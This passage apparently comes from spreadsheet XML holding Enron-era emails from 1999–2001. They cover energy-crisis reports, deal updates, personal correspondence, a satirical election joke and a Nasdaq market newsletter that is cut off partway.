'charles.yeung@enron.com', 'howard.fromer@enron.com', 'cristinah@elektro.com.br', 'jpr@ceibo.entelnet.bo', 'james.steffes@enron.com', 'ricardo.charvel@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'joe.hartsoe@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>Please send to everyone</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
	Janel Guerrero_x000D_
	03/20/2001 08:48 PM_x000D_
		 _x000D_
		 To: Ginger Dernehl/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Please send to everyone_x000D_
_x000D_
Ginger:  you still have the master distribution list.  Will you please foward _x000D_
the documents to all of our people?  Thanks_x000D_
_x000D_
----- Forwarded by Janel Guerrero/Corp/Enron on 03/20/2001 08:47 PM -----_x000D_
_x000D_
	Richard Shapiro_x000D_
	03/20/2001 12:19 PM_x000D_
		 _x000D_
		 To: Mark Palmer/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Janel _x000D_
Guerrero/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Consumer Group Reports Issued_x000D_
_x000D_
FYI. Janel - you might want to distribute more broadly within group.-- Thanks._x000D_
---------------------- Forwarded by Richard Shapiro/NA/Enron on 03/20/2001 _x000D_
12:17 PM ---------------------------_x000D_
_x000D_
_x000D_
"Samantha Slater" &lt;SSLATER@epsa.org&gt; on 03/20/2001 12:08:16 PM_x000D_
To: &lt;bhawkin@enron.com&gt;, &lt;bhueter@enron.com&gt;, &lt;bmerola@enron.com&gt;, _x000D_
&lt;christi.l.nicolay@enron.com&gt;, &lt;donna.fulton@enron.com&gt;, _x000D_
&lt;Elizabeth.Linnell@enron.com&gt;, &lt;harry.kingerski@enron.com&gt;, _x000D_
&lt;janelle.scheuer@enron.com&gt;, &lt;jeff_brown@enron.com&gt;, &lt;jhartso@enron.com&gt;, _x000D_
&lt;jmigden@enron.com&gt;, &lt;jsteffe@enron.com&gt;, &lt;jsteffes@enron.com&gt;, _x000D_
&lt;marchris.robinson@enron.com&gt;, &lt;Mary.Hain@enron.com&gt;, _x000D_
&lt;Mona.L.Petrochko@enron.com&gt;, &lt;Paul.Kaufman@enron.com&gt;, &lt;rboston@enron.com&gt;, _x000D_
&lt;rshapiro@enron.com&gt;, &lt;sarah.novosel@enron.com&gt;, &lt;snord@enron.com&gt;, _x000D_
&lt;Tom.Chapman@enron.com&gt;, &lt;tom.hoatson@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Consumer Group Reports Issued_x000D_
_x000D_
_x000D_
On March 19th, the Foundation for Taxpayer &amp; Consumer Rights published a _x000D_
report in it's Bailout Watch newsletter (Special Report: The Manufactured _x000D_
Energy Crisis) concluding that California's energy crisis has been _x000D_
manufactured by "energy firms."  A copy of the report is attached and is also _x000D_
available on the organization's website at www.consumerwatchdog.org._x000D_
_x000D_
Today, the Consumer Federation of America released a report (Behind the _x000D_
Headlines of Electricity Restructuring: A Story of Green, Irresponsibility _x000D_
and Mismanagement of a Vital Service in a Vulnerable Market) asking _x000D_
policymakers to "rethink" the move toward retail electric competition.  A _x000D_
copy of the report is available at their website at www.consumerfed.org or _x000D_
www.consumerfed.org/calmkt.pdf.  Copies of the press release and the report _x000D_
are also attached._x000D_
_x000D_
_x000D_
 - calmktpress.pdf_x000D_
 - calmkt.pdf_x000D_
 - bailout21.pdf_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 03:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Michael:_x000D_
How's your summer?  Are you in Delaware now?  I am going to set up a weekend _x000D_
in DC in the Fall and I will probably do it around homecoming weekend.  I _x000D_
want to try and set it up for most of the people will huge out with, but will _x000D_
take other suggestions.  I will be sending out e-mails to everyone informing _x000D_
them of the weekend.  Choby is going to set up a bar to rent out for Saturday _x000D_
night.  In the past, you have sent me e-mails with a bunch of different _x000D_
e-mail addresses attached to it.  If you could send me a list of the e-mails _x000D_
you have for our friends that would be great.  Thanks for the help and lets _x000D_
talk about this further.  Talk to you soon._x000D_
Ben</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 09:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>We have closure! (well, sort-of)</t>
  </si>
  <si>
    <t xml:space="preserve">Corey,_x000D_
_x000D_
Here's an update, I sent this to Emily earlier today.  Let me know about this _x000D_
weekend (i.e. the game, tomorrow night, etc. etc.)_x000D_
_x000D_
Susan_x000D_
_x000D_
---------------------- Forwarded by Susan M Scott/HOU/ECT on 09/21/2000 04:56 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
09/21/2000 02:38 PM_x000D_
To: ehillegeist@hotmail.com_x000D_
cc:  _x000D_
Subject: We have closure! (well, sort-of)_x000D_
_x000D_
I'm soooo good.  The chosen path was cool, indifference.  _x000D_
_x000D_
So, last night was Steak Night and with Nick and Wilson both in town we had a _x000D_
really good showing.  I got there about 7:30 with Nick, and the group's size _x000D_
swelled to about 12+ by 8:30 - 9:00.  About 8:00 I saw Kevin (Ted's pal - the _x000D_
one you meet a steak night) wandering around LW's obviously in search of _x000D_
someone.  Can you believe it?  He (Ted) knew I had organized this gathering - _x000D_
I know that because Nick is working right across from he and Darren and _x000D_
overheard Darren encouraging Ted's attendance (mind you Ted was not in the _x000D_
email distribution) - and he had the nerve to come.  Anyway, Kevin saw me and _x000D_
came over to chat.  He informed me that "our friend Ted should be there _x000D_
shortly" to which I responded, "You would know better than me at this _x000D_
point".  The subject was dropped until he felt the need to raise it again.  _x000D_
He asked if Ted and I parted on good terms/ bad terms, etc.  I said there _x000D_
really weren't any terms, I just hadn't heard a peep out of him for about 2 _x000D_
weeks.  Kevin wanted to know if I was going to break a bottle over Ted's head _x000D_
and cause a big scene.  When I said no, I think he was genuinely _x000D_
disappointed.  I said in order for me to do something like that I would have _x000D_
to care about the "loss" and that, while a week or two earlier I might have _x000D_
cared a bit more, with each passing day the "loss" seems less and less like _x000D_
much of a loss.  Kevin told me I was better-off without Ted.  To go even _x000D_
further, he informed me that there is no way he would ever let a daughter of _x000D_
his date Ted nor any of his "girl-friends".  He said that while he thought _x000D_
Ted was a great guy (i.e. fun to be around, good stories, etc.) he wasn't _x000D_
good dating material.  I agreed with Kevin saying "Ted is a great guy, he _x000D_
just makes a lousy man" (don't you like that one?).  I then went on to say _x000D_
"Anyway, I'm destined for bigger and better things, right?".  Kevin: "Much _x000D_
bigger and much better."  About this time my parents showed up...the plot _x000D_
thickens.  I introduced Kevin to my parents and since both my Dad and Kevin _x000D_
were in the Navy and attended Colorado they had much to talk about.  The two _x000D_
of them had probably been talking for about half an hour when _x000D_
"dum-da-dum-dum" Ted shows up.  He approaches our group because he sees Kevin _x000D_
and is forced to make eye-contact with me.  I give him a "hey" and he gives _x000D_
me the arm squeeze and a much too pleasant "how's it going?".  He asked what _x000D_
Kevin and my Dad were talking about, I told him the Navy, he said don't get _x000D_
Kevin started or you'll never shut him up...Then he walked away.  He never _x000D_
acknowledged my parents nor did he ever speak to me again the rest of the _x000D_
evening.  The beautiful thing is Kevin stays and talks with my Dad for _x000D_
another half hour and when Darren shows up he hangs out with "my group" for _x000D_
quite a while before going to join Ted.  My parents and I ate our steaks _x000D_
right behind Ted and then went back over to our group at the picnic table _x000D_
when we were finished.  It really was a great night.  I would almost say I _x000D_
was glowing (I was having so much fun with my friends and family and it _x000D_
wasn't a show for Ted's benefit...I really was having a great time).  So, _x000D_
when my parents decide to head out they walked over to Ted/Kevin's table to _x000D_
say good-bye to Kevin.  It was awesome.  Ted's sitting right next to Kevin _x000D_
while Kevin and my Dad are talking and appears to be actually shrinking in _x000D_
his chair.  Yet again no acknowledgement of my parents - he couldn't even _x000D_
make eye-contact.  I ended up staying there for at least another hour and _x000D_
then went with a few of the guys to the Ale House.  Needless to say I was _x000D_
very hung over today.  Anyway, there's the story...He's a complete and utter _x000D_
ass-hole.  So I'm done.  And no, there is no way he could weasel his way back _x000D_
in to my good graces.  _x000D_
_x000D_
Now on to a fun subject, my trip to London.  I bought my ticket today ( I _x000D_
think I got hosed a little bit, but it was the cheapest ticket I could find - _x000D_
$450 before taxes).  I will arrive at Heathrow airport around 7:00 a.m. _x000D_
Friday the 6th and depart about 11:00 a.m. on Tuesday the 10th.  I'm very _x000D_
excited about the trip, I really need to get out of Houston.  I leave the _x000D_
activities in your capable hands.  ( bear in mind I will have to see Darren _x000D_
and Nick at some point)._x000D_
_x000D_
"Single again" Sue_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 05:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mike.maggi@enron.com', 'john.arnold@enron.com'})</t>
  </si>
  <si>
    <t>Holiday party</t>
  </si>
  <si>
    <t>I know it will be close to impossible to get out but I wanted to invite you _x000D_
to our Christmas party on Dec 20 here in NYC- we'd love if you came.  If not, _x000D_
in the new year, I hope we can set something up where you meet some of the _x000D_
new funds we are dealing and have some fun up here._x000D_
_x000D_
I met someone good to work with you guys at this last Super Saturday- David _x000D_
Larson- Berkeley- good derivatives, trading knowledge, personable.  I'll fax _x000D_
through resume- we are making him an offer for the analyst pool._x000D_
_x000D_
Thanks for all you help always,_x000D_
Caroline</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 01:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Steven J Kean/NA/Enron on 09/13/2000 _x000D_
08:20 AM ---------------------------_x000D_
_x000D_
_x000D_
Michael A Sadler &lt;msadler@ksu.edu&gt; on 07/27/2000 03:49:00 PM_x000D_
To: skean@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: meeting_x000D_
_x000D_
_x000D_
_x000D_
Dear Steven:_x000D_
_x000D_
Just to refresh your memory ... we met in June to discuss future job_x000D_
prospects at Enron.  At that time, you had offered to get me in touch with_x000D_
someone in the Finance Division (?) at Enron to discuss similar topics.  I_x000D_
am sorry to bother you with matters such as this, but I am still very_x000D_
interested in a position with Enron and would like to follow through on_x000D_
this offer, if you are still willing.  As an aside, another contact gave_x000D_
me the name of Rob Bradley and suggested that I get in touch with him.  I_x000D_
don't know if that is who you had in mind, or not._x000D_
_x000D_
I am moving my wife to Houston next week, and will be available to meet_x000D_
any time from Friday, August 4 until Thursday, August 10.  After that, I_x000D_
leave for a conference in Seattle, but will back in Houston for one day on_x000D_
Thursday, August 17th._x000D_
_x000D_
As for my timetable (which at the time you had told me to keep you_x000D_
apprised of), I will continue in my position at K-State for the Fall_x000D_
semester.  After that, I'm a free man.  I have a couple of academic offers_x000D_
for temporary positions in the Spring, one at Rice and one at UT-Austin._x000D_
The latter is very appealing, but would require my absence from home_x000D_
during the weeks.  As such, I am still wide open beginning in January._x000D_
_x000D_
In spite of the fact that I awoke at 3:30AM in order to get to the_x000D_
airport the day that I met Jim Steffes and you, I got a lot out of our_x000D_
meeting.  I was very impressed with Enron and what you had to say, and am_x000D_
hopeful about future prospects with the company.  I remain very interested_x000D_
in a future position at Enron, and perhaps in Public and Government_x000D_
Affairs (I hope I have that right)._x000D_
_x000D_
Thank you for everything.  I hope that you had a nice vacation._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Mike Sadler_x000D_
_x000D_
******************************************************************************_x000D_
*_x000D_
_x000D_
Michael A. Sadler_x000D_
Assistant Professor_x000D_
Department of Economics_x000D_
Kansas State University_x000D_
320 Waters Hall_x000D_
Manhattan, KS  66506_x000D_
_x000D_
(785) 532-4574_x000D_
(785) 532-6919 (fax)_x000D_
_x000D_
msadler@ksu.edu_x000D_
http://www.ksu.edu/economics/msadler/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 03:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.jacoby@enron.com', 'kathleen.carnahan@enron.com', 'ccampbell@kslaw.com', 'fred.mitro@enron.com', 'jkeffer@kslaw.com'})</t>
  </si>
  <si>
    <t>Escrow agreements</t>
  </si>
  <si>
    <t>Are we ready to sign these today?  How many originals do we need?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 05:09:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>Deal</t>
  </si>
  <si>
    <t>Last week:_x000D_
_x000D_
We just signed a 5 month, very small deal (1.2 MW, interruptible, R$85/MWh at busbar)._x000D_
_x000D_
We signed 2 contracts for past transactions: Tradener/Itambe and AES-Sul._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Remi</t>
  </si>
  <si>
    <t>Mon, 13 Sep 1999 08:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Here's the "retry" by Marval. It doesn't help us.</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sara Shackleton/HOU/ECT on 09/13/99 03:10 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Carmen Moreno &lt;CAM@marval.com.ar&gt; on 09/10/99 04:10:37 PM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------------------------------------------------------_x000D_
Este mensaje es confidencial. Puede contener informacion amparada_x000D_
por el secreto profesional. Si usted ha recibido este e-mail por error,_x000D_
por favor comuniquenoslo inmediatamente via e-mail y tenga la_x000D_
amabilidad de eliminarlo de su sistema; no debera copiar el mensaje_x000D_
ni divulgar su contenido a ninguna persona. Muchas gracias._x000D_
_x000D_
This message is confidential. It may also contain information that is_x000D_
privileged or otherwise legally exempt from disclosure. If you have_x000D_
received it by mistake please let us know by e-mail immediately and_x000D_
delete it from your system; should also not copy the message nor_x000D_
disclose its contents to anyone. Many thanks._x000D_
 ---------------------------------------------------------------------_x000D_
_x000D_
_x000D_
_x000D_
 - att1.unk_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 11:54:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'h..cook@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'william.fleenor@enron.com', 'joan.quick@enron.com', 'kelli.little@enron.com', 'russell.diamond@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'c..koehler@enron.com', 'tricia.spence@enron.com', 'donna.lowry@enron.com', 'santiago.garcia@enron.com', 'eric.boyt@enron.com', 'sherri.griffin@enron.com', 'mary.cook@enron.com', 'a..hudler@enron.com', 'chris.herron@enron.com', 'n..gray@enron.com'})</t>
  </si>
  <si>
    <t>EECR Deal Pipeline Report 10/8/01</t>
  </si>
  <si>
    <t>Attached please find Enron Energy Capital Resources' Deal Pipeline Report for the week of October 8, 2001._x000D_
_x000D_
 _x000D_
_x000D_
Diane H. Cook_x000D_
713-853-7059_x000D_
diane.h.cook@enron.com</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 12:03:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'c..giron@enron.com', 'd..hogan@enron.com', 'anne.bike@enron.com', 'kristen.clause@enron.com'})</t>
  </si>
  <si>
    <t>Mid-year Review</t>
  </si>
  <si>
    <t>To: Kristen Clause_x000D_
_x000D_
On behalf of Darron Giron and Anne Bike,_x000D_
_x000D_
	Please accept this invite to go over your performance review tomorrow morning @ 10:30 AM, in EB 3269._x000D_
_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 05:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jose.bestard@enron.com', 'jeffrey.shankman@enron.com', 'lisa.yoho@enron.com', 'tom.briggs@enron.com', 'cindy.derecskey@enron.com', 'steve.walton@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'maureen.mcvicker@enron.com', 'robert.frank@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'ginger.dernehl@enron.com', 'susan.landwehr@enron.com', 'leslie.lawner@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>The final word</t>
  </si>
  <si>
    <t xml:space="preserve">Jim- I do have faith._x000D_
_x000D_
 BREAKING NEWS!_x000D_
&gt;_x000D_
&gt;  GOD OVERRULES SUPREME COURT VERDICT_x000D_
&gt; Bush to be smitten later today_x000D_
&gt;_x000D_
&gt; (Vatican) In a stunning development this morning, God invoked the "one_x000D_
&gt; nation,_x000D_
&gt; under God" clause of the Pledge of Allegiance to overrule Tuesday night's_x000D_
&gt; Supreme Court decision that handed the White House to George Bush._x000D_
&gt;  "I'm not sure where the Supreme Court gets off," God said this morning on_x000D_
a_x000D_
&gt; rare Today Show appearance, "but I'm sure as hell not going to lie back_x000D_
and_x000D_
&gt; let_x000D_
&gt; Bush get away with this nonsense." "I've watched analysts argue for weeks_x000D_
&gt; now_x000D_
&gt; that the exact vote count in Florida 'will never be known.' Well, I'm God_x000D_
&gt; and I_x000D_
&gt; DO know exactly who voted for whom. Let's cut to the chase: Gore won_x000D_
Florida_x000D_
&gt; by_x000D_
&gt; exactly 20,219 votes."_x000D_
&gt;_x000D_
&gt; Shocking political analysts and pundits, God's unexpected verdict_x000D_
overrules_x000D_
&gt; the_x000D_
&gt; official Electoral College tally and awards Florida to Al Gore, giving him_x000D_
a_x000D_
&gt; 289-246 victory. The Bush campaign is analyzing God's Word for possible_x000D_
&gt; grounds_x000D_
&gt; for appeal._x000D_
&gt;_x000D_
&gt;  "God's ruling is a classic over-reach," argued Bush campaign strategist_x000D_
Jim_x000D_
&gt; Baker. "Clearly, a divine intervention in a U.S. Presidential Election is_x000D_
&gt; unprecedented, unjust, and goes against the constitution of the state of_x000D_
&gt; Florida."_x000D_
&gt;_x000D_
&gt; "Jim Baker's a jackass," God responded. "He's got some surprises ahead of_x000D_
&gt; him,_x000D_
&gt; let me tell you. HOT ones, if you know what I mean." God, who provided the_x000D_
&gt; exact_x000D_
&gt; vote counts for every Florida precinct, explained that bad balloting_x000D_
&gt; machinery_x000D_
&gt; and voter confusion were no grounds to give the White House to "a friggin'_x000D_
&gt; idiot." "Look, only 612 people in Palm Beach County voted for Buchanan._x000D_
Get_x000D_
&gt; real! The rest meant to vote for Gore. Don't believe me? I'll name them:_x000D_
&gt; Anderson, Pete; Anderson, Sam, Jr.; Arthur, James; Barnhardt, Ron..."_x000D_
&gt;_x000D_
&gt; Our Lord then went on to note that he was displeased with George W. Bush's_x000D_
&gt; prideful ways and announced that he would officially smite him today. In_x000D_
an_x000D_
&gt; act_x000D_
&gt; of wrath unlike any reported since the Book of Job, God has taken all of_x000D_
&gt; Bush's_x000D_
&gt; goats and livestock, stripped him of his wealth and possessions, sold his_x000D_
&gt; family_x000D_
&gt; into slavery, forced the former presidential candidate into hard labor in_x000D_
a_x000D_
&gt; salt_x000D_
&gt; mine, and afflicted him with deep boils._x000D_
&gt;_x000D_
&gt; Dick Cheney will reportedly receive leprosy._x000D_
&gt;                                    -30-_x000D_
&gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 09:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sshackl@msn.com'})</t>
  </si>
  <si>
    <t>SmartPortfolio.Com Update: Nasdaq Sails Beyond 5000</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sara Shackleton/HOU/ECT on 03/09/2000 _x000D_
05:50 PM ---------------------------_x000D_
_x000D_
_x000D_
"SmartPortfolio.Com" &lt;admin_update@smartportfolio.com&gt; on 03/09/2000 07:10:20 _x000D_
PM_x000D_
Please respond to "SmartPortfolio.Com" &lt;admin_update@smartportfolio.com&gt;_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SmartPortfolio.Com Update: Nasdaq Sails Beyond 5000_x000D_
_x000D_
_x000D_
_x000D_
The following is a FREE service brought to you by_x000D_
SmartPortfolio.Com, located on the Web at_x000D_
http://www.smartportfolio.com_x000D_
&lt;A HREF="http://www.smartportfolio.com"&gt;AOL users click here&lt;/A&gt;_x000D_
_x000D_
Update March 9, 2000_x000D_
_x000D_
Thursday's Market Update: Nasdaq Sails Beyond 5000_x000D_
_x000D_
 1. Thursday's Market Action_x000D_
 2. Internet and Tech Stocks_x000D_
 3. Notable Earnings Announcements_x000D_
 4. Notable Upgrades and Downgrades_x000D_
 5. Stock Splits_x000D_
 6. IPO Commentary_x000D_
 7. IPOs Trading Thursday_x000D_
 8. IPO Calendar_x000D_
_x000D_
********************* Advertisement *************************_x000D_
_x000D_
REDBACK NETWORKS JUMPS NEARLY 10% AFTER ANNOUNCING STOCK SPLIT!_x000D_
  Smart!Splits Readers Knew About it Beforehand!  Did you?_x000D_
_x000D_
Didn't know that Redback Networks (Nasdaq:RBAK) was going to_x000D_
announce a stock split yesterday?  Subscribers to the_x000D_
Smart!Splits Report were informed of this possibility in last_x000D_
week's report!_x000D_
_x000D_
To find out about the next stock split that can enhance your_x000D_
portfolio, visit: http://www.smartportfolio.com/freetrials_x000D_
&lt;A HREF="http://www.smartportfolio.com/freetrials"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
*************************************************************_x000D_
_x000D_
Need this report sooner?  Please remember that you can always_x000D_
read the update on our web site at_x000D_
http://www.smartportfolio.com/update_x000D_
The update is posted at approximately 6:00 PM EST every day._x000D_
_x000D_
1.  Thursday's Market Action_x000D_
_x000D_
                             $ Change   % Change      Close_x000D_
Dow Industrials               +154.20     +1.56%   10010.73_x000D_
S&amp;P 500                        +34.99     +2.56%    1401.69_x000D_
Nasdaq                        +149.60     +3.05%    5046.86_x000D_
Internet Stock Index           +42.29     +3.95%    1111.96_x000D_
_x000D_
The Dow recovered in Thursday afternoon's trading session,_x000D_
making big gains before closing up sharply, while Internet and_x000D_
technology stocks propelled the Nasdaq to its fifth biggest_x000D_
single-day point gain ever to close above 5000 for the first_x000D_
time in history._x000D_
_x000D_
Thursday's early market action had all major U.S. indexes_x000D_
performing lower following the Labor Department's report that_x000D_
the number of Americans applying for jobless benefits increased_x000D_
for the second consecutive week to 280,000 from 275,000 in the_x000D_
previous week.  At the same time, however, a more accurate_x000D_
longer-term measure showed that the closely watched four-week_x000D_
moving average fell for the second straight week to 277,250,_x000D_
which represented the lowest figure in 26 years.  Economists_x000D_
view the four-week moving average as a more dependable indicator_x000D_
of job market trends since it accounts for weekly fluctuations._x000D_
_x000D_
Notwithstanding the Labor Department's report, financial stocks,_x000D_
which typically are sensitive to news related to potential_x000D_
interest rate hikes, performed well, with American Express_x000D_
(NYSE:AXP) edging up 1/8 (+0.10%) to 122 7/8, JP Morgan_x000D_
(NYSE:JPM) gaining 5/16 (+0.29%) to 107 11/16, Chase Manhattan_x000D_
Bank (NYSE:CMB) closing up 2 1/8 (+2.69%) to 81 1/8, Goldman_x000D_
Sachs (NYSE:GS) finishing up 5 7/16 (+5.34%) to 107 3/4, and_x000D_
General Electric (NYSE:GE), which has a substantial financial_x000D_
services component, rising 1 1/16 (+0.82%) to 131 3/8._x000D_
_x000D_
In other financial stock news, Deutsche Bank AG, Europe's_x000D_
largest bank, and competitor Dresdner Bank AG, the third biggest_x000D_
German bank, jointly announced on Thursday that Deutsche Bank_x000D_
would commence a $30 billion takeover of Dresdner in a_x000D_
transaction that would create the world's largest bank with $1.2_x000D_
trillion in assets.  Under the deal, the combined company would_x000D_
close approximately 800 branch offices and reduce payroll levels_x000D_
dramatically.  It is estimated that these cuts would result in_x000D_
annual cost savings of over $2.75 billion.  Following the_x000D_
announcement, Wall Street began speculating about whether this_x000D_
deal would put increasing consolidation pressure on U.S. banks,_x000D_
including financial giant Citigroup (NYSE:C), which edged lower_x000D_
by 7/16 (-0.87%) to 50 1/16._x000D_
_x000D_
One of the strongest performing sectors on Thursday was the_x000D_
pharmaceutical idustry, with Bristol-Myers Squibb (NYSE:BMY)_x000D_
jumping 12.04% (up 5 3/4) to 53 1/2, Merck (NYSE:MRK) gaining_x000D_
6.93% (up 3 15/16) to 60 3/4 and Eli Lilly (NYSE:LLY) closing up_x000D_
8.11% (up 4 1/2) to 60._x000D_
_x000D_
Insurance powerhouse Metropolitan Life Insurance announced on_x000D_
Thursday that it would acquire the remaining interest in_x000D_
insurance asset manager and research firm Conning Corp._x000D_
(Nasdaq:CNNG) in a deal valued at approximately $68 million._x000D_
MetLife already has a 61% stake in Conning that was captured_x000D_
through MetLife's January acquisition of Conning's indirect_x000D_
majority owner, General America Corp.  MetLife, which is_x000D_
scheduled to trade its shares on the New York Stock Exchange by_x000D_
the end of March, increased its offer from $10.50 per share of_x000D_
Conning to $12.50 per share.  Shares of Conning gained 15.98%_x000D_
(up 1 11/16) to 12 1/4, while shares of other companies in the_x000D_
insurance space performed well, with Chubb (NYSE:CB) rising 3/4_x000D_
(+1.68%) to 45 1/2, Aetna (NYSE:AET) closing up 3 1/8 (+5.77%)_x000D_
to 57 1/4, and Hartford Financial Services (NYSE:HIG) gaining_x000D_
15/16 (+3.19%) to 30 5/16._x000D_
_x000D_
Investors reacted on Thursday to the request by the Federal_x000D_
Communications Commission (FCC) for more information relating to_x000D_
the proposed $135 billion merger of America Online (NYSE:AOL),_x000D_
the #1 Internet service provider, and Time Warner (NYSE:TWX),_x000D_
the media and cable giant, after the initial filing by these_x000D_
companies was deemed insufficient.  While a second request for_x000D_
information by the Justice Department or Federal Trade_x000D_
Commission frequently is viewed as a sign of potential delays in_x000D_
approving a merger, analysts expect that the FCC request will_x000D_
not delay significantly the agency's evaluation of the proposed_x000D_
deal.  Shares of AOL rose 6 (+10.93%) to 60 7/8, while shares of_x000D_
Time Warner gained 7 7/16 (+9.38%) to 86 3/4._x000D_
_x000D_
Among the big Dow movers on Thursday were:_x000D_
_x000D_
&lt;&gt; Boeing (NYSE:BA), which closed up 3/8 (+1.12%) to 33 3/4_x000D_
following the aerospace giant's announcement that an ongoing_x000D_
strike could hurt the company's earnings and cause longer delays_x000D_
of jet deliveries._x000D_
_x000D_
&lt;&gt; AT&amp;T Corp. (NYSE:T), which dropped 3/8 (-0.71%) to 52 5/8_x000D_
following news that Dan Hesse, president of the company's_x000D_
wireless business that will be sold in what could be the largest_x000D_
U.S. IPO ever, is leaving AT&amp;T to take the helm at an Internet_x000D_
start-up company._x000D_
_x000D_
&lt;&gt; Hewlett-Packard (NYSE:HWP), which rose 11 (+7.81%) to 151 7/8_x000D_
and was a driving force behind Thursday afternoon's recovery on_x000D_
the Dow._x000D_
_x000D_
2. Internet and Tech Stocks_x000D_
_x000D_
For a FREE trial to SmartPortfolio.Com's in-depth analysis of_x000D_
selected Internet stocks, please visit:_x000D_
http://www.smartportfolio.com/freetrial_x000D_
&lt;A HREF="http://www.smartportfolio.com/freetrial"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
Internet and technology stocks continued to drive the Nasdaq_x000D_
higher, with several companies hitting new all-time highs during_x000D_
Thursday's trading session.  Among the several high-flyers_x000D_
reaching new records were Redback Networks (Nasdaq:RBAK), which_x000D_
jumped 32 3/16 (+9.82%) to 359 7/8, Nextel Communications_x000D_
(Nasdaq:NXTL), which rose 15 15/16 (+11.63%) to 152 15/16, Cisco_x000D_
Systems (Nasdaq:CSCO), which closed up 6 15/16 (+ 5.24%) to 139_x000D_
5/16, and Phone.com (Nasdaq:PHCM), which gained 24 1/2 (+16.90%)_x000D_
to 169 1/2._x000D_
_x000D_
GoTo.com (Nasdaq:GOTO) announced on Thursday that it would_x000D_
acquire AuctionRover.com, a resource for online auctions, in a_x000D_
deal valued at approximately $170 million.  AuctionRover's_x000D_
proprietary technology permits buyers to search for products and_x000D_
services that are being auctioned in cyberspace.  Online search_x000D_
engine GoTo.com operates an Internet marketplace that introduces_x000D_
Web users to advertisers.  Shares of GoTo.com, which analysts_x000D_
believe will benefit tremendously from its e-auction acquistion,_x000D_
fell 2 5/8 (-5.20%) to 47 7/8, while shares of online auction_x000D_
companies finished mixed for the day, with eBay (Nasdaq:EBAY)_x000D_
dropping 1 1/2 (-0.82%) to 182 1/2, Yahoo (Nasdaq:YHOO), which_x000D_
operates Yahoo! Auctions, gaining 6 1/4 (+3.53%) to 183 1/4, and_x000D_
Amazon.com (Nasdaq:AMZN), which runs Amazon Auctions, closing up_x000D_
5 3/16 (+8.15%) to 68 13/16._x000D_
_x000D_
In the wake of International Business Machines' (NYSE:IBM)_x000D_
launch of a large-scale Internet campaign, the company announced_x000D_
on Thursday that it has signed agreements under which local U.S._x000D_
telephone providers Bell Atlantic (NYSE:BEL) and SBC_x000D_
Communications (NYSE:SBC) will test IBM's new Internet access_x000D_
devices.  While IBM did not disclose the number of devices that_x000D_
would be tested in the trials, analysts predicted that the_x000D_
testing by Bell Atlantic and SBC Communications would be a major_x000D_
step in IBM's efforts to shift its focus to the development of_x000D_
products designed specifically for Internet access.  Shares of_x000D_
IBM gained 1 3/8 (+1.29%) to 107 5/8, shares of Bell Atlantic_x000D_
closed up 2 1/8 (+3.76%) to 58 5/8 and shares of SBC fell 1/16_x000D_
(-0.15%) to 41 9/16._x000D_
_x000D_
Old economy fast-food titan McDonald's Corp. (NYSE:MCD)_x000D_
officially has entered the age of the Internet.  The world's_x000D_
largest fast food chain announced on Thursday that it has made a_x000D_
significant investment Food.com, which provides online food_x000D_
takeout and delivery services.  McDonald's also is exploring_x000D_
various online opportunities for some of its smaller restaurant_x000D_
brands, including Donatos Pizza, Boston Market and Chipotle_x000D_
Mexican Grill.  Shares of McDonald's rose 7/8 (+2.85%) to 31_x000D_
5/8._x000D_
_x000D_
Other big movers in the Internet and technology sectors_x000D_
included:_x000D_
_x000D_
